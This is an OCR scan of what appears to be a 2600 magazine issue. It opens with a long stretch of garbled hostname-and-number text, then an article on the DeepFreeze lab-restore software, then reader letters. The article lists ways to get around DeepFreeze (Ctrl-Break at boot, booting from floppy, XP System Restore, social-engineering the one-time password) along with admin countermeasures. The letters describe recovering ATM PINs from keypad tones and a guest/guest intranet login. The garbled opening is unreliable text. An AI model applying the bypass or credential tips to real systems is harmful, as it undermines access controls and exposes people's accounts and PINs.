rTvnevarnF&fi 1 4 3 [104 1431 raiiraclerTi.an 1 [114 13] mrraclomBnlO [H4.80 mimctatnanvi n 4.62 rriLraclentanl 2 1114.66 imraclemanl 3 [114 67 miraelbni.iril 4 [114 &t mtradbiiran i S 1T4.S6; ■niracleman 16 [K4.69 -niracleman? J 1 1 4.63 ■niiaclepnana ■ 1 14.7? i ii ■ ncle in ;i n5 H4.73 miT-elbrtibnS 114 7* mipucleniinSB [lta.&fi] mifaclemsn7 114.76 miffldsflianB 114,77 pTinaelDmcn? 114 7| rnl^di^a lycho |3.12?' mo^Duah : | ’?s e] mobcushTB [1 SB. IQ' mat-push 1 D I IR0 161 metrcuali 103 190 163 mebpuahi04 199 104 mgbpueh 1 06 106 I DG mabfushl 07 1 1 90 1Q7 mahfiuahl D0 1 -99 149 mebpg E h1i [180.111 mebpushl 2 1 15)6. 12| maboueh 1 20 [ 1 96 . 1 29-| mabpuahl? 1 1 9fi, 1 3] tnobpusb 1 36 IBS. 130 fli&Bpuni-ilSt iOfl.131 •rid ispu e -ii 32 ' 06. 1 32 moPpuEMi:; EE10 133 mobputih !34 ,90.134 nohpualtise TR9.13S mehpg 5 nOO T9S >30 mebcushia? I 190.137 mobpuEh13B 1 9B 1 30 mebouahl 3? [180 13B : TObUbsH 130-100 [139 l M| n-rabpush 1 39 1 0 1 1139 1O1J m-obCKJ&hH I E9fl. raj mchpush 14D 190.140 moh(Hijh141 ISfi.141 nehr.,,-.l,14£ [196 142 mobpush 1 43 [l?fi.l42 m-Db[KJ5h 144 1 90. 1 44 mefipuflh146 198.145 mobpusni4R 1% 148 mempuahMO 1% i4 0; nn^ppas-TlS [1 90. 1 5] irr-pppuEh 1 543 IRS 150 marjpusJtlSS ER8.15V nu>bpD*h182 19S. IS?' ■nctipu Bh 1 S3 196.155 macpuablW 190.154 mabpuanisS 190.155 maBpufihi5S 199 156 mobpttthlS? I 98. 1 87 m0bpuxihi86 I9B.156 mabpuahE59 1 90. 1 59 mdbpuahIG |iR8 1S| || .uht'UKh 1 FIC- 180,180 1 it ib push 1 01 18&161 rnebpup»bT02 160.162 mdbptrah>03 100 165 FTIDbpUfif I 1 64 I hi 164 mebpuahlfiS 19R.16S imatipush1% 1&&I&6 mGbpu-Shl 6 7 1 58. 16 7 ThObpu E-", 1 66 1 98. 1 6 fi mobpira'm 69 1R6 (69 : "-.Up jg.h17 =190.1 -'I mobpuBlil 72 [19S .i':aj mobpusblS il 00. Ifi] rriDdpusbIS [106.10] mabpush? [126 3] snuPpunh?0 190 Ml ■rietipu ab£ 1 l90 2tf mdfcpuaiit! 
1 9 J 1 50 .2 1 9] macipuar>22 190 22 maibpubrifO 190 23 mebpuxn?* 196,24 motrpuihSB IM £5 mebpush26 106 26 n-.ccpuahZT >99 27 iTiDti,.iiah26 1R8 20 mubf3u«h?9 13* 29 mpbpui.h3 ] 108,3| mpbprUBh^O 196.301 mabpuahSt < 56.31] mebpuahS? 138.931 mebpuBhJR >98.39] Iron b pus hH 10S.34] mobpuEhOS ! y&.3&] aiebpT&h38 IRS 36] ri>citipii*Ji37 1 gg 371 iiiebpign.hSS 1 1 90.30] "iobp-j:Eh3S 1 98 39] n-mbpus,h4 j Fyfi.4] mcbpuish4D [190 *6 mobpush41 130*1 mobpLi4H4S [19B 42 mabipuri>h4 9 [lfifi *3 mDbpue+H4 190 -E4 mobpLi Eh* 5 133 45 mobpusMfi 198.46 mabpuaii47 igti*? mnbpi.iqJUfi 106 as mobpLLai>*9 Ego.*? mobpusns [ 1 90,5; ma.bpuah5(? 19S.5& mqmpueitBI i-98 01 rne-bpuahsa 108.52 mobpuBhSfi [13B.53 n-iobpuaJi&4 130 54 mobpuehSfi IM 55 mobpudh&6 IM bt: mobpuaih8 -' i&5 57 mobpuHF-.tiK 5 3f3 56 mabpuohS? J3fi 5R mabpusli& [1 B0 6E mobpueinRO [198.00 mobpuahSl J 98.6 1 ma,bpU&E>62 198.62 ma>bpu4h£3 196.60 mebpuah04 196,6* ifDbpLiBbeS 196 65' matipijBihfib 1 96.6e rraspu&h67 190,67 (ncbpuehfiD IRR60 rnebpRishfig- [19R..69 rFrebpwah? [108 71 -r’dbpt-Gh 70 1 95 70] .-robpushT 1 • 1 10 .71 1 mpi5puah7?[1R0-7?] rnabpuah73 f 190 ,731 (MCbp :Gh74 1 1 SR ?4| mcbpc&h 7S [130.7 ij mobpGEhve [ 1 PH 76 mctipijshT? [130 7?] mobpuah7fi [190 761 mobpunh7D [i?9 7fi? mobpu:;h0 i I9fi.fi i mobpuBh80 ! 1 36 GO mobpushBI [1 30 0T mabpusha? [i3 R b;^; m«bjnjn nfl 3 1 Bfi 03! mobpush&4 [i3fi.04; mobpusnB5 [130-BS] mobpu 9 v.06 j 1 9fl Hr. mobpusJi07 IM 07 mObpusoOs 1136.08 "’CHbpoB.hSO [ 1 90.69 rTvafepuahO [190.9] fl uPp-uahUrF [1 R0 ,W] rmeckPudk [07 681 irvCKd 106.10) naaLeanake ] k.79[ mpoTioglai [40. 195] mortal II* jlfl?,iaj mo*e* radium j'79 129] mDee-abra.a1pna [14.130] moea-aladifl. mph# |e* lWj moss-tneunema tyche 13 ?ia: mros-anleaEai. epoch [25,181 mcci-aq'jarii.ii 1 ilphji [14J1J fliroc Hibck alpha 1 14 1 361 maes-aithur alc-ha 114.1 3 3J maE-a-Bsiro a>pha [14 34] moss-bamhi alpha It* 7Q| m(T94-ba4h1i*l arpna It* i£B] T-dSE ■ t"l SS. 
QriQf' |26 41[ TFHis-a-bast.lv-' u [3 35] h-.i [14.1 31) mCiFS-flWh js6pha (14.3?) maSG-flpunnlar EyiJfcb |3.?10] nUMB-loghorn uiphfl 114 M0] !tiM6-1afdham.opon [36 40] rtipofl-lrsarfi. epoch [24.110] mcse rfrogFinh. tychfr [3 .9 1 1 rooE-E-gatora (?5.9| moss- gaby. Tycho 1.3 57] nwaa-gorir: u& alpha 1 14 3-H| rmtp-ijtiJdBan j Ipna 1 14, 148] mosr- g0*df is h I yaha [3 70] ir-oss -goody. mplm 114.84! pwas- group Bf.tyrfw |3.17&> maas-gj Pinoy. alfifca |*4 >65] FnO5B-0U.rtiPy.4lptlJ. j I 4. £71] •noM-r»nirti*irtith,iyche [3.25) ■Tia-aa-nappy fi ; om-i T14 144| fria-se- “ Liunre alpha [14 1 9aJ iti&Ki-isolnefcflo.-DrhDn pb 1 04] mSsa-ftormUHa&.lytha |3.7®[ rflo*s.-h(inevh'nvvri bran |?8 i?3] moes-hypnd alpha [14.72| moss- aamina .alphn '14 M7[ mpsa- awfiah tyeho 13.119] mote- ayhawk apse ft [25.1 9] moSG- cilyi n ; yeha [3 2CQ| mose- '.gglypuU alpha [14 i99J -mose-kanga alpha Ii4 fipj ■mo'aa-ttorrge.. orion | j Q. i 00] fn[ik5-kri>Blt.Ofltir-. [20.25) mWi'Bln flfphfl [14.194] me-ss-lite erkm |26 16| moaG-iobsEar.Ivchc 1 3 1 8 1 ifiMS-louio. alpha. [ 1 4 . 1 1: /) inoM-lyi*tfti| .tycho ] 3.24] mesa madknrn lyghn [3 Ej mose-maio .tycho |.J 33] nnt^a-mflivdann tycho [3 48] mw marvm. alpha | * 4 108] owes-- meSwUT a Iphn [14.110] noGs-mophtilp .njj'i.i *j4| ma&s-mod .orion [?G I 1 4] maao-mnUielob. -orion |26 1211 ir ..iP^-noLhay a'pf’a |H moss fmcMya Open [20 19] moss-millfsr (jriCrfi 1 28 103] maaE-milo. alpha [14 i S 1 ] mtMB-mDda#o.prH3n [26 Hi] mQSS nwlhiifc tyCPo 1 3.2*3] mo5&-rnph»dn *M«i (2fi,1?0{ mMB-mulan alptwr ] 1 4 150] inpaa-munphy. orron [26 fl] fflO^B’ihultlsy alpha [ 1 4 . 1 5| mOu -nfSn EycNa [3 220] moE-s or In pup Tycho [3 56] mosa-olivawl. aloha [H 14| miisa-o&car alpha [14 Ttfij Ifloss • p*l alpha 1 14 24 1 n»55 • p a fA HA, a Ip h * [14 21 1 moss-patch alpha [14 141] moss-pace alpha ] 14 i£2j moaa-pigiel alpha |ifr 1 7H | moia-pdanar.tiricin |2fi 42] moss-piranlni lycho [3 36| mosa-EHeahla'y.alphfl. j 1 4. 
150[ inosa-ptaep.tycho [3 44 1 iriras-prfikty.a Iphil ,1 14.20,1 rapts-pnoyis .atphu [14.1AJ] runs* pooh nlp)Mt |T4 79] mosE-po-pBya. alpha [14.EJ7] moas-rZI scare orion (28 I07[ ipdfrf-rwnbow.tyeho [3 1041 mosE-rontlflM. ilfJui [54.53] moaa-radflla vPpha [14.1 fj4| moflB-rodhooli .OriOh [!j*i 1a| moBB-rc-d&rnpfl.oric-r il£] ittcsa i nudi unner a ipha [14 1 90| rmMjj rdonlphis [14 163' rnoG-G- roz alphn 1 1 4 1 09 1 moa&- Guppora. orion I2B 43] mPBB-Bcailop.lychn |3.5Q] mo w-ntooby. alpha [14 40 1 moaa-HcrappV-a Ipl^a ] 1 4 . 1.36J ■TioBB-scuriin: alpha [14 S3] fflGsa-ae-iPri&s.lyc^o r3.1?Pi moaa-aeflhDrEpa rydw 13 35| ftKjaa-siWirtMd.tycrws 13.70] anjwahnrlt.lyChd [3 40| mOES-Gh4K:*!Brp flpgeh |25.2I] nH)E&- s-'rreh alpha |T4 7 05| iiMJisft- ailyerfiah. tycnc ]3 147! ragBB^irtma. alpha [14.90] nvo&G- &*!fl|rjck T 1y[rh£j [3.471 mp&a Gisapy aiph.n [14 Mi] mpaa-GnBlf.lycho |3 200 1 rnor-K-r.iieaZy alph.: |14 146] mgsa-anaopv.alphs ; I 4.47! moes-*ncn!B!i .nipha [M 134] maas-GOI o*ipn [SC .341 46| na^ioasl tyono |3.&0] niflUHJOflJl [2WJ! riminpoolll [20.- I ] rnottipool 1 3 1?04 125) numhpaoTlS 1204. Hi] ! »fi Pi pCl'J 2 [204.^1 nlhlup«425 [204 25 1 n nth p 00*26 (204 20] niothpooia rscH.a ri.iithpoolfl ^204.4 ii-hihpoulf. 204.5 rttnihpooie 204 b hinthpool? 4 ?i? 4.7 flinihpooiE 704 & i’.inlhpppiBS [204 d5 ftinlhpdoH3 [204.U3- nlniripgnrlpil [204 10] fiirufloa [s 2] hlBc.radPum j73,i33| npg apooh |25 E4) ngrpUff 4a [16«.t2B| noofcSBCk |nr, 0 1 j nolacahlh [40 471 notlUngoti 1 156. ’63 1 udYHbylla 1 152 13[ cilyrnpijv [ t . 1 3[ once 176,12] ohephed 'fs [10? 62] CMvalap 164.66 Ohl [1.45] oriftrhbrin (04,21 ] onrarrip ft 2. t v opahcoumry [-00 10D] upricaogla [32.65) npEral0l4-12q69-3& (150^11] ortHbodipflo [1&2.73] ordeaitiBr*. [&< 07[ andBalbaah (04 .263] $rlglB9 i 13- 3 . 
91 orirjrt *Cll(rte [102 112] onmtl [1 ?i] oacan [32 40] pajaon ms 132.60] gEhaicard [91 .0 1 nrhBiploio J4O.105] oEheTiKorfci !64 12&J oijlpoioo | i r *0 l 33] ou=si-Je [45.11) owl [15 133] oxlrowlakfl [153.1441 cjib-raho [153.140] oxlEhca [153 1361 Ox1C.nl 1 45 14| OyWOfUad (40.103 1 pflChuc Blflnk |1 76] pacilkOesii [134 pacil!Cidsali4 s94.i4 pauii-cJearsi iy-i 21 pagj.ftas*al22 194.22 paciligd*dl?e 194.20 paoliDdo;i'40 >14 45 pB£jhpdaal52 [1 94.52; pa-uhPdaaJB [ = 94.61 .. .Li.-ru .il-: .I.iig 1 13A.60 j pnfiFirdn al97 [ 1 04 97] padJeshaH |40 i50J painledduck [190 1?9] poJaanlBd (1 14 106 rai=)dnl07 114 197 PfllBahl99 114 195] paiaan20<3 ! 1 1*.2O0| paiaan202 1 1 + 202, ffltiaanal [114 1B2| pal*aw10(114.1&5 saieahglT M14 103 ofiisanol? H4 IS- 7 paisarol j 114.193 limauJlti 1 4 114.175 pgig.innl 5 114.172 p ai oa-n c T 6 H4 160 paisapol/ 1 14.T71 paisanolS [114 1d9[ paifianoi9[H4.2»S paisanoZ [114.200] pHiufjrnJZO [114.163] nnlAArtci?l [114 1SBJ oai-sno22 1i4 1701 palaano23 114.210] paiaanp24 114.177] IJLii nnuZ 114 207] 114 171] parsanaS in 1h7 pa^sariQO 114 200 [ilI !: .lliU r 1 14 !50‘ gdiSprlOfi 111 174 PBIITnihpFJ 114 1 76 DaiximapnHy | S 73] nalG.c 332.52] paMbwef 1 123 30 1 pallgraifliaO 726 130 ptflgrewTai 126 131 paJlgra&a>32 i2fi 132 paFlg .ji a / i 151 9] POdr jrn* (150.139; P0EP»O.1.,ooiip5« [1Q2.1T4] panic [32.231 peppaMnrtlBI 19 It 5, papparykriilizg [9 125 pDE7pnrvkntll31 9 131 p(K?P0ryknd.t33 19 132 pfloporylinitl 93 9 133 p€pparvkn3t!4? [0.253 f :r.-ur«'ivr M‘52 0.152 [Mpporyfeninss 9 156 poppa ryknin 57 9i57 papperytoifll S4 9.tfl4 pappflrykhil199 9. 1 99 peppflrvhriU206 3.206 pgrilpi glial 0O 592 1Q0| perilpmnoiEi [9? 1?fl| perilprunoiSI [9?.126| parllprurvaS? 
[ri2 57] par 1 15& [102 140) pBlddam jGC1.73[ ph.gn’ir.Ti |> 6C1| phiHiaa 1 33 27| plrkiLste- 1 153 23] -pigeonwpod (64.2 T3j pirifl-kn&h alpha [14 73] piniayljg [101,129] pinssyl 30 1 191 130 p0reayT31 19T.131 pmsay132 191132 pinuy133 191 133 p31 136 jUnoayW E91 137 plnwy13a ItBI.1 36 pinsnylag <91 139. pinaavl+O IB-1.140 pinaav in 1 0 1 . 1 4 1 plrlday 1 44 19 II 44 pir-n-py l 46 [101.140 pimayM7 491 147 piiway E+0 [1 9i , 1 40 pi "-say 1 49 101 149 plrttay150 191 150 pittwyBH [101 209 phwaySIO 191 210 p-nsayZT. 1B1.2H1 p»n»ay212 191 212' pm&Ay215 191 21 5) pil [1 70| plague [32 *7] ptanal. aclipES 1 162.77) plant if I [6 06 ) pFjgriigigpe [40.461 ptomernOia [ 1 53 1 32[ ptuahtail 1 1 53 1S3[ p«ushLBiii53f 153,1651 piuBhtail156 'l53. 15eS pig*hl(ill150 153.153 ptuaMainSf 153-159 pJuHhladlili 153 10? pluchi.,1 =153 1 53 103 plgahlfl4164 153 164 :-.IudFi1a.I 165 F 53 165 plirehwiaio >63 210 pluah1a42f2 153.21? plusny 12 [155 1 2 nkidh y13 155-13 pluphyfll 155 91 DluEhyhye 11 S5.2&] pluBhylour J 1 £5 8[ plu^riyona | >55 .4 1 :.lu..hy;li , irt [155.7] pluflhylwn [155.6] pluln WtlSlahm [111 1 □ | pmi'rier 1 64 701 pgtaria.acItpM |ID2.66] pgiigiidpg I551tt| pcnlyann-u 45 1Q| paonbear p23 1 16| popi [34 3 p 1 36 j radra alarm [106 2.^3] rail |4ri 10-1 raidai im ]162 12®| ram barrels 2 [155.32] raanbarroi0&[1S5 89] rairib-arreig [155 2 j rfriairtfcangl 29 [206.1291 r^isinbung^O [206.1301 raisinbongl 3 1 [206 101] raismbongiae 206 s 30 j l Bifrihtwrhg 1 37 206. 1 37] raisinltongTifi [2D6.130] rarBinbon&l 39 206.1 39] raismbcnai'tO [?Q6 i4tJ] raismbongi 'iri |2rn= i .|ri raiElnbcngi + l tZOC 141 Mibincuiig ■ ->2 rafif 1 42 -i.vir.inJsufKj *43 [206.143 ra.iEin4>gngn4 [206.144 raiamUonij 1 4S [206 145 rolalnbnnpHS -206 M6 rjEatobongl 47 206 147 raiilribg4^|14e 200 146 fBWTlbgwSl 1 49 206 1-J9; raiBrntjongiiiO ?D0 150 rais nbcmgl43 ,2 u>j IF>3' Eihunbong 1 54 [206.154 rill" irit:.|]i 11 j ! 
5fi [20=6.155 saisinftgnotOa [206,156 raisinbansj s S 7 20SJ&7 ■ aialcbanglbd- 20D.15S raifli -.hung 1 59 206. 1 59 rmsiobDngieOpOB 160 mmihbnnBiftI 2W 161 raamboogie? >266.103 raui nboeg 1 63 268 18? 1.1 ■; nbo- y lei 206 164i r .,i _ ~ r 1 1 : ■ 1 1 16(7 [20Li 167] ratfinbsnnlOB [206 166] ratH.nborig 1 70 208 170] fasunbong 1 71 ZLlfl.lTI] ruibihbongl 72 206 1 7Z rajnintwrig173 306.173] rai&inbonjf?O0 [306, ?0B] ■ aiEinbongiZlO ZU"! 2 1 0 j 1 alfrlmbprig31 1 260 211] rflrvnbanij?! 2 ]2D6 2l 2] r®6Jnbono?1 3 [206 3? 3] rarEmtK.ng?i4 [206?14| ra:s=nbong2l5 2D6.?t5] r4imntHing2IE 1206.2 = 8] ifljalnbofigaiT 206.21 7 1 raisinbgnbfiia [206 210] raPBlnbonnfi 1 0 [2Q6 ?19| 4BialnE>pn?2£0 [206.220=1 raisin bon 5? 2 1 [2M.391J raiL-iit-nngSZ? [200.222] raiihfrsea radium 3 ,2] riirrmnos IfiStara-a ITB IOO) rampariJjle [166 131 1 rarr-pyalipy ]l0fi 13?] rarigeafialler [O* 83 1 J .LlUt:- 1 [45.13] |61 10| TaltlewhalS 1 33 [01.133; raStlawhala 1 33 [01 133 rii!tla*h.ala 134 61 134 1 dll Iflvrhalel 35 01 135 r-BhlewhAlgl 3B 61 136 ratiMwhaleISfl 61.130 rarile whfllal 40 61-140 ■adiewhaia 141 6i i4=, !HEI1awhflj&142 01 143 :.vu,=wii.i;,i|-n rii 143 iB>rWiilfl144 [51 144 ; aillawh ale 1 46 [01.1 45; ra1tlswrulel45 81.148 raltlBrthalel 53 61.153 rHlllewhalelOS 61 155 ra1llewtwta165 81 >85 ralUt-rt^aieihC ftt iF50 ran!e«riate 1 70 61.170 rfll: !.*= . 1. 13 1 7 ■=■ [61.171 ialliDWhnCn1B4 01.104 rariiewhaig 1 87 Fjl 167 'an j ewha : &2 [61 .21 latdawhaleZAD [61.250] raFH*Wfl4J«fi1 1 6 1 .35 '■ 1 filtlewrHfcieM 01 50 raEtlowhftloSi Oi 5i laitlawhalHSS hi £5= raven ■, 6b 24] ravens [33.23] rew»ea Alplta |M 39| razercuE j G-4 2101 redciay. epoch [25.83] 'fedckick .alpha [14. bj j rc-dfiTjrrl EyChb [3.3 1 1 rodwrt [33 14) reFracrury [ 1 54. 33] selaycohLmi >1 71 21 83 1841 r. 1 .■ 1 1 L-n 1 35 =63. [£'-■ robh«n142 193. M2 rot|Lflnl4a 193.143 robHen1£5 193.156 roOlrenlSB 1 93. 166 rnblrGhl 57 103,157 Ohl-rril^ [195 =5?! 
by The Ratline

With the past few issues, I've noticed a few queries about a program called DeepFreeze. Being someone who works with it on a day to day basis, I thought I might clear up a few murky areas and discuss some of its features/drawbacks to help illuminate both users and admins who might be using this software.

DeepFreeze is a program made by Hyper Technologies (www.deepfreezeusa.com) for Windows platforms, and is designed to be a deterrent to "hackers" (quoting the website here), virus solution, and maintenance tool. Essentially, what the program does is take an image of your hard drive on installation and "freeze" the system, making any changes to the system after bootup temporary. I have been hard pressed to find something DeepFreeze couldn't undo after taking basic precautions (more on those later). Formatted drives are back on reboot, programs installed over a freeze are gone, a virus can even infect the system, and on a restart, it will be gone. However, the computer isn't permanently frozen.
The program can be uninstalled of course, once the computer itself is "thawed," but DeepFreeze can also temporarily disable itself for a time so that one may make changes as needed. It quickly becomes apparent that it is vital on installation of DeepFreeze to have everything perfect on your computer before freezing it. Disabling DeepFreeze can be a pain in the ass and time consuming, so getting a good, clean, working install right out the gate is vital. Obviously, for an open lab/school environment, DeepFreeze is incredibly useful in keeping computers running with relatively few problems. Unfortunately, I haven't taken a peek under the hood as it were to see just how DeepFreeze does what it does, but my bosses and I would be very interested if someone out there would take a look and get back to us on the mechanics of the program.

DeepFreeze currently has three major versions that I am aware of and have had experience with, two of which are outdated. The first is a standalone install, usable only in a Windows 95/98 environment. This version is different from other versions in that it is the only one to have the disabling process before Windows starts up. Watch the computer boot up. The Windows splash screen should pop up for a moment before going to a black screen, and in the upper left-hand corner of the screen you should see five dots appear, one second apart from each other. This is your opportunity to hit Ctrl-FH to access a password prompt. After entering the password, you have numbered options available to you in a text screen, which you access by hitting the number. You can continue booting the computer, boot the computer thawed, or change the password. These are all pretty self-explanatory. Note that this version has a few flaws in it. You can Ctrl-Break during bootup, either to mess with how Windows starts up, or even in theory to prevent DeepFreeze from starting.
(I haven't tried this yet; we migrated away from this version pretty quickly.) Next, you have to thaw the computer on every reboot, so once the machine is thawed, you can keep it thawed by doing a soft-reboot in Windows (left shift as you click okay to restart on the shutdown menu). Double-clicking on the frozen icon in your task tray displays ASCII text as was mentioned in an article. This is text used for One Time Password (OTP) generation. Basically, this version allows you to call up Hyper Technologies and give them this code, and they reply with a password that is usable on that machine once. You can then reboot, use the OTP, and reset your password. Obviously, a little social engineering is all that's needed to defeat this. Hyper Technologies must have realized this, because it doesn't use this system anymore.

The next two versions of DeepFreeze come in two different flavors. The first is Standard, which retains the stand-alone method of installation of the old version and needs configuration on each computer. The second flavor is the Pro version, which comes as a console package, then creates individual, tailored. The two release versions more or less are identical, the only difference being that one supports Windows through Win2000, and the most recent also supports XP.

The console is kind of nifty. On install, it asks you for a string to make the console unique, so that one console won't affect every install of DeepFreeze out there. After that, it gives you the ability to create diskette-sized install packages for your computers. By default, there is no set password, nor is there the ability to set a password. Default settings use only the One Time Password option, relocated from Hyper Technologies to the console. However, if you want to have a static password, you have the option of setting up to five and the option to change any of those five passwords.
You also have the option to freeze individual drives or all drives, to schedule "maintenance time" (times of day where the computer reboots and is automatically thawed for a set period of time), an idle reboot timer (after x number of minutes of no keyboard/mouse activity, the computer reboots and refreshes itself in the process), the opportunity to create a "ThawSpace," which is basically a mini-file given a drive letter that isn't frozen by DeepFreeze, and the ability to lock out access to the clock/calendar, and disable the Ctrl-Break function at bootup. After all this is done, you save the configuration, create a setup file, and zap it to your diskette. You can also disable the freeze icon in the system tray, forcing the user to use the keystroke combination of Ctrl-Alt-Shift-F6 to get to the password prompt.

On the computer side, the computer now boots up frozen. If you hold down Alt-Shift and double-click the freeze icon (or use the above keystroke combination), a window will pop up prompting you for a password. At the top of the window, you can see your OTP token to get a password from the console, as well as the version number. The latest one I'm aware of is somewhere around V4.20. Enter the password and you get three radio button options labeled "status on next boot." The options are "boot frozen," "boot thawed for X reboots" (X is configurable), and "boot thawed" (until you say otherwise). Also, it appears that the latest version will automatically allow the updating of daylight savings, without having to thaw the computer to change it. Perhaps this is the reason why DeepFreeze will block access to the clock now.

Uninstallation for all three versions involves thawing DeepFreeze. With the first two versions you can then go to the control panel and add/remove programs and remove it that way.
The most recent version now requires that you run the setup file from your install disk with DeepFreeze thawed for the option to uninstall, so don't toss the install disks after you're done with them.

There are still some issues with DeepFreeze that I doubt can be avoided through programming. First, naturally, is the observation that booting to a floppy will prevent DeepFreeze from starting. Any admin worth his weight will turn off boot from floppy and password the BIOS to prevent tampering as is. Second, System Restore in Windows XP has the ability to uninstall DeepFreeze, even while it's on and frozen, by simply restoring the computer to a point before when DeepFreeze is installed! It basically does to DeepFreeze what DeepFreeze does to the rest of the computer. Any sysadmin should disable System Restore in such a public setting as would justify DeepFreeze being used.

With those two precautions in effect, it becomes very difficult to get around DeepFreeze. With the implementation of a central, unique console, security involving the OTP is a little better (admins have control over it now at least).

Finally, one note on the usage of DeepFreeze on NT based machines. For some reason, DeepFreeze seems to be dependent on the SID. In an environment that uses image-casting software to deploy images to multiple computers, DeepFreeze screws up royally after running SysPrep or refreshing the SID, usually requiring a format to fix the problem. It's important to pull it off before refreshing the SID, and then put it back on. Speaking of imaging, one weird quirk with Symantec Ghost and DeepFreeze is that occasionally, when performing a hard reset on a computer or rebooting after the computer has reached the "it is now safe to shut down your computer" screen, it will prompt you with a screen saying "Operating System not found." It's a minor annoyance, as a reboot fixes the problem, and it's rather rare.
I actually keep a copy of DeepFreeze around for my home computer. Why? It makes a great sandbox to play around in. I can do anything I want and screw up my system as much as possible, and the fix is only a reboot away. Anyone wanting to fool around on a computer with DeepFreeze on it can do so without worrying about messing up the software. You can even power off or reset the computer without the proper shutdown procedure. DeepFreeze doesn't care if Windows shut down improperly - it restores it to a nice state anyway.

Hopefully you've gained a little bit better understanding of this program. It's becoming more widely used in the world, and understanding its strengths and weaknesses helps the curious better use or appreciate the program. It's also a great example of how a strong piece of software can be bypassed due to the ignorance of an administrator.

continued from page 39

Dear 2600:
I have found on several ATM's that all ten number keys have distinct tones and can easily be told apart. This is the dumbest thing an ATM manufacturer can do, as anyone with a good grasp of tones can easily get someone else's PIN without watching or very easily record this, take it home, and analyze it with standard audio software. At the very least, it can be used to impress (and frighten) friends as they shield the keyboard from your prying eyes.
Mark

Dear 2600:
You printed a letter in 19:2 regarding google removing a site from their directory due to a DMCA violation which was filed on behalf of the Scientologists. I tend to get a chuckle out of the Scientologists so I figured I'd see what the violation was. At first I found mostly boiler plate stuff (pictures and documents) until I scrolled down to the end. Under "Federally Registered Trademarks" we find an L. Ron Hubbard signature which is registered with the United States Patent and Trademark Office under registration number 1,821,751.
Now let me get this straight. This idiot actually went and trademarked his signature? Wow, I wonder what happens when he signs for a Fed-Ex package. It probably causes quite a commotion.
The MbbliT

Dear 2600:
Late one Tuesday night I came to a realization. As I finished a box of Cheez-Its, I realized that if one halved the box at an angle, it makes two perfect holders for one's issues of 2600! Sadly, I only had enough issues to fill one, but I trust I'll fill the other.
Spooky Chris

Perhaps we're witnessing the birth of a new phreaker box - The Cheez Box (not to be confused with the original Cheese Box of days past).

Dear 2600:
While I was at FOX's web site trying to find out when I might be able to buy episodes of Family Guy, I ran across this gem:

"Can I get tapes of FOX Network Primetime Shows sent to me?

"ANSWER: The FOX Network does not provide nor sell videos of any of the shows, specials or movies that air on the Network.

"Our recommendation is to ask co-workers, friends, family and neighbors for anyone who may have taped off-the-air the show you are looking for."

Now correct me if I'm wrong but wouldn't that be stealing or some sort of copyright infringement? Sarcasm fully intended. It sickens me to realize that this was my first thought when I read this. Look at what corporate America is doing to people. Down with corporate rule! You guys do a fantastic job. Keep up the great work.
jessc

Let's just hope this common sense approach becomes more of a standard.

Dear 2600:
I think Jack Valenti is a great man doing great things. The hacker community will soon be behind him.
Christopher

It's the logical place to be if we're about to overtake him.

Dear 2600:
I just received a shareholder report from one of the funds in which my 401k is invested. I usually throw the report out or file it away without reading it.
After reading my earnings statement and finding that the value of my 401k had dropped by 20 percent, I thought maybe the report could give me a clue as to why this had happened. It cited various reasons already covered by the media, but this was my favorite and I thought you might like to read this:

"And Now for the Bad News... The popular passion to punish the corporate culprits is likely to achieve only modest satisfaction. Fraud was rare and is hard to prove in court. Legal but bad behavior carries little cost to the perpetrator. The U.S. does not have the strong 'culture of shame' which effectively regulates executive behavior in Japan. We have no compulsion for ritual apology (to say nothing of ritual suicide) in this country. Many of the executives who lost a fortune for the shareholders who trusted them simply will sail off into retirement on their yachts."

This report came from the Clipper Fund. It has a web site at www.clipperfund.com. This report may not have much of an impact but hopefully it may open the eyes and ears of those who refuse to listen to the same information just because it came from a hacker magazine. Thanks 2600.
justiiiburh

Dear 2600:
I just literally stumbled on this while researching something. Go to www.singtr.com, click on the "intranet" button at the bottom of the screen. Enter "guest" as both username and password. Voila! You're in the Singer Company's intranet.
jmk

Or so they say. There doesn't seem to be a whole lot you can do as "guest."

Dear 2600:
I just got done reading 19:3. In the letters section echelon talks about White House numbers like 3 U 436-9431. I called it out of curiosity. The guy on the phone answered "Situation Room." I asked what they do there and he struck up a conversation about siinu in the Rocky Mountains.
Then he slipped and said he was in the White House. I called again later tonight and a guy answered and asked for my name and phone number. Of course I gave him false info (not like he couldn't have gotten it anyway). I asked the guy again what they do there and he put me on hold a sec and said they were a private federal government agency and they take care of security matters. I spoke to a close friend who is ex-Air Force Intelligence. He told me that is where the top military officials hold conferences on top military matters and that I should not have that telephone number. That is the same room where they held the talks about the Cuban missile crisis. Well, hope this enlightens.
Radarjam

We admittedly don't know a whole lot about what goes on in that place. But common sense would dictate that repeatedly calling the equivalent of an internal crisis center in an increasingly paranoid and powerful government may result in some kind of backlash. Of course, the ease with which such information can be found makes one wonder how serious they are about keeping it secret in the first place.

Dear 2600:
I just picked up 19:3 and read your response to echelon's letter noting a phone number for a "situation room." When I tried your RDF URL I got a 404, so I thought I'd let you know where I eventually found the info: http://www.fema.gov/emanagers/ecd Joc.shtm. FEMA doesn't advertise this kinda stuff, but a search for "contact" produced it easily.
sunzi

Dear 2600:
This was published in The Economist of October ’ft Countries were ranked according to press freedom. The top five were Finland, Iceland, the Nether-

in mind. I was driving home from work and heard something on the radio where a local business was having a to-do of some kind to honor the fallen firefighters from 9/11.
(They made no mention of the police that died that day.) Next to me in the passenger seat was my crisp new copy of 2600 that I haven't even finished reading yet and it dawned on me: hackers and cops are a lot alike in some regards. You see, I'm a cop. And an avid reader of 2600. And a want-to-be hacker. I just don't have the time right now to devote to learning how to program and I refuse to be a grown up script kiddie. But I digress. How are we alike, you ask? Hackers, the real ones, work hard at becoming good at something and most desire only recognition for achievements and take pleasure in discovering security holes and learning how to fix them (only to name a couple things). The hacker community constantly has to deal with a host of morons who pretend and claim to be hackers but instead give everyone else a bad name. And us cops? We, too, bust our asses to do our jobs, get little recognition for it, and the ones who stick their head up their own asses and do something dumb attract the whole country's attention and we, too, become public enemy number one. The big difference? People smile and play nice when I'm around... a hacker walks through his high school wearing a Free Kevin shirt and gets expelled. Oh yeah, why would a cop want to learn how to hack? Someday I hope to work for the Feds hunting down those who would victimize children through kiddie porn. I consider that, besides drugs, one of the most important things the government can focus on. So hack on! And keep putting out this kick ass mag knowing that there's at least one of me out there on your side.
Sparkster

A New Project

Dear 2600:
Do you expect a DVD version of Freedom Downtime to be available for the holiday season?
Poetics

